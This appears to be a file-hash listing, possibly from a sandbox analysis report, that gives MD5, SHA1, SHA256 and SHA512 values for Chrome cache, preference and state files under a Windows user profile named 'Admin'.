MD5 10261fb3deced2bdd10323c75c7ee24a
SHA1 bf31ee7ee7aaed6df339497fd92879703320c431
SHA256 0d250936b22d4a36c003312fc8b13da543af3de52b8fa2295e6b38c97d698058
SHA512 43103c0a609f5dc80e21479eb98a04b9b137be495bad36304a2848e6cf349132710aa4fc49b10655fa1724973027e9586243a695866760e51d5a1ebaaf37afd8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\3ba9945495b7b833_0

MD5 08f4586b1e31dd8f5836bbaedffcc6e2
SHA1 0f78494bf6e87de5d1e4c92f11e35e3d5aab4346
SHA256 e1b368c16758505b2b241dba4e1bc850bf51265167d4505d3af34e32cf2e8a2e
SHA512 b73788fa80553b1028f7f56b607faf442f565587ba68b8d81f43cd653f10bafb969f6717760025920edf478db6eb2cbde67ed34d31a1f26ea6653323b20e2251

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fed1cb4e16b3a1d7_0

MD5 7a6d398d38f00b9680b5e7e362deccac
SHA1 f855c64f42691f2b64d1029a9e98b3ee8c72bc17
SHA256 4d8e57fb9f28d2156084b415552ea3205dca4af9ef6d88dd994f2c2a1a439ba5
SHA512 dca2eb08677ee93b124d74fc2059c89892c3cc0e9f5081cc0f1776ac5c14687fb07190d32abc8df3a0b3f9a40fe193e8a7d2cdf2f2d0b49267e91fd12049ca7b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\07a0c4a3e1abceea_0

MD5 bf2ddd4930ed8a274387085ed034bf63
SHA1 9846a908987db2759465c5a571b35cbadf7df2bc
SHA256 d752a76d27e155f9a253c109bd0807a033f2400bac409684c458fd3bff49cbc4
SHA512 de92d8eabaa1138c938491f570d875c46d16e22c7d071c4824b189971f9ee784e855e4b8b780e63e724cdefe6df72631b671e21cdda0b6a38ae84e84eb92fdef

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\00237b8e0e6ffdc1_0

MD5 a9c7fc4a4d5ea1e3fc2d6d680c011bec
SHA1 ad7d7e67a13f08b0e8f81b69d4a9a3669d34fb99
SHA256 c4f1c47a5b615e5d848bf3c6f6e615e8e644747b4f58e168013203970d2f73dc
SHA512 5da02b03115ca8729298b283717247d5aac77da1b5d35eeb65c52ed63fc842c0d32dbadd97a6e3dccd2ea15e4505d4bbac5c679e200e654229f0e25de9143442

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\c93622985013877f_0

MD5 d800aaec3eb1a0c28bddd950f14b4458
SHA1 15c77f1c189de820530481721cae00477973cb44
SHA256 1c5efd45a0a0e8c8588ea8655452ba1f093ff9395d30969b62ba653f298a2495
SHA512 a52950f82d0218fe58a363549fd43eb77efd08272241b6c8caa452d2e94faee6193a7e822d0a785e743298b2529d6111023e30e7df5cb9d9ea71715825ca4c01

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\50927248caf9bfae_0

MD5 cede61a3a013d846811662776bb180de
SHA1 fa2ea7f9130dbf7fd2f8cfccaa9321b03d2a2193
SHA256 44994e1a9c48d27e21c3def6c0ffdf2ef2249d010aba553f42ce939815ca38b1
SHA512 fd2ec0b40239dc48084252f8b1267a0db1cd2fe01ec8947f0cd2ca6394ed0f8135af981989c42688dc6fa2c637b2d4a51c4f5197b63c578afc06bca79133cdfd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b5c0b0d2ff0cad95_0

MD5 e2075bfffe086ec1b50546f9cc3a90be
SHA1 ba50f2cbfca14d44d53886f4cbe4c58a44653299
SHA256 510f6234e4271138801ec53bd8415a47d81594c60bfe1d2bdd9aad8f413bb906
SHA512 c4c3ebebe295ab3ae38f3d1afcf68871cb0ff31e81e34e159da9765bf042106f0f9da5c4f2bc4b2230595e5ecc68506eb22ce8e30016f53bc64264ec86defe66

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 d746ad870393ca297475a0e73d669bd8
SHA1 e0338e601a106f18e321273b6e703a8ad00ad4f1
SHA256 f9e126f2464998620ac9e5cfcb4c029273f91f96a392c617dc27932773983e34
SHA512 eba8b55fcf4e8231d5522871f15f13800abc7ff2d19803a3a84b9455490b48da83a18a105d23911c00cb6bf39246d9d0f77a0c55dd2812a63d017c5928f7d981

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 bffeb6b06f2961294d9bad40464bca6f
SHA1 ea613c355cf08dd7bf356442f35f662a25ba5ca1
SHA256 27780817db6f9cb284dc30408e9240bdc966c8917708256a6f8e7511615ecc70
SHA512 886015de7d8cc73954d4bfe7785a31e1c081e43fdd57062ee6acd385dbe48c955f114d68e00005ffa32b045a1295b0676767627be3a2735041427cf505824c9b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d702a27711d7cf4786af2958fccc0f41
SHA1 d86b47eef9967e658fa35580f21fdf3ab0cd203f
SHA256 c95b253c231830d4d00abf19bc4738b44f9647c7652de1023c994ff42e388dcc
SHA512 22a8b6e0842a5ea3713d94e6ee0ae2b7283633565cdbbe7adba7410b20c58b5c9242f656c02405d92226045eaf876f21590134ae222dc2ac35ca93aa97630c51

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6cfce551bf24aa7a8d3094a154c209d9
SHA1 c5a0cdb81f44f9fcc8d477036ab2daa8b30bdcc6
SHA256 b9b166aaa0536fc1990ba030f4bb62e5a7250bfd8c705e7bca2a19615021995f
SHA512 443306d8e69ba08e2f92d93cd5217ea6028399a8ba53d3f7f9ec6012be0069027ddc619fd8f02067996bd9f56cb3557e2b0ac023f118f8755e9bc3db76055757

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 2a1d5982609bd41dda7bdd40c875c4d2
SHA1 6a138dfec78c0a96bdbaf083a6dd14863268281c
SHA256 c23a53c0e3536895e70a62b255f5b6fcca609c62a57d75741e0bffdb13e9484b
SHA512 f630b315268b00c043d6ccf3cd2c61f6732af57087b8bf34a6f723f7eb28e9c958116f81f40f788270563eb1d707fbabe1d6bfa684e48b1677793db37cec819d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000027

MD5 3dda883b89b1f31dd1e8e0be2d4250e9
SHA1 ff69000e8307afcb2b4db7d6117b47975f9de06a
SHA256 e60268695e6c66a62ad318850e45954bb22d21f2ae62fe9f0c5490dcb1e69f9b
SHA512 25176c5acc9cf658129508ccc1b7fc8e93777cc59a404caf06a0e0eeb7c10b5276923aa51d56a99ebfd45d9f05b16f598794fb31ea0aa39565770b3c3b8c8c43

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028

MD5 3e0379fa3f0f53026f5db1397280925d
SHA1 c0e0f3c1456fdf51ccfee7412c2fe8d6512a368f
SHA256 c5aa76c615cbb43f20f84d8b941f99700669670ce344ed0347db9ce7c2571f18
SHA512 2b198f0f5defe2f494326af7c3e06ce5daf588eb386c365cb4b39a8d9fa8c91fc9872290fe8bcdd114ec178634a9e15e381f78d3a46d82e7887ce8bd566367be

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000026

MD5 9e3954e384c5af053acffd96b63a7289
SHA1 74be79c98f6daafdff906e9a2fb3f44246fb94da
SHA256 3cdc949b2b68103b862b14487c5cb36e138ef9bc7cbf23b2a90849c28cf606c5
SHA512 b16235a6be76e0281971ad173bb782b9df275839e15267ce54e45c40d30836055b2be31c7f273a91203ea4de94ade39b0f11d7e9c57bfd0d38f4054ab7f53fc0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\019eedb9-f918-432e-a030-79d4456a2157.tmp

MD5 97eb065efbf15962d7cc6af0f865f4ed
SHA1 f796c2032657815135b94488f9dd8b30d92ec153
SHA256 31ea5c1c5eeaccdc05905dfa2868a87600eb7d9e4f0a12f4f686bdd645537722
SHA512 b61296a4d94ba3ce3f9af7a31146cb90e225c3121866a8d626eabdf54087c540bf43fbd8f2f9c5758f0ab21c97fec484461951bbb15e4b39ca8f7bb80ced356f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000035

MD5 03230dd42f79a152d4167da777b25930
SHA1 5fb12828c21013decbdcaaa6a0b172958319a4b8
SHA256 b38bb176acfe61a3ebaa9dd41cf299f0ebfe364762b213ef8281f750eedcbbb1
SHA512 79a24a7c52a0023e285266b22dbe9e53aa276f8dd1db93545eab857510d6bfa7f1bae76d3cd09910e9362e32a341ea679d54fe1abca6965976c204279eb2871e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000036

MD5 0e598b4e0838f1540edaaa0ebf6d1e68
SHA1 a69cc56bc59a19d8e0da1b74db64b0f6c319e095
SHA256 4ed8eeb9c3e8abd8a3ae9a6e4a0da56d3bb513938555795256d73cbd578bbe17
SHA512 4a00bd10f567a45b9a3332a50803002f4a089bc38b065657e2a921d505c0a10c4275add2d6c9b4c3ea6a5ba87ccff47140aad0222bef3fceac331de97cb1f273

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 72e3ed0de077ed665a311910ddc88ea0
SHA1 f490aa0b60b377f551891c6eedfb5b86e8a81ffb
SHA256 64668ee6ab04250e97c797c56205efc2b2934e43fed5a5f08ad30205e73c2594
SHA512 a55a6adbceceda4aa90f626ac8405f6c829416d8b07a530b4c5683fca48f01defe991db4c317003cb252e2de33de17c8adae9f63600d7c0474fe0971aff88b62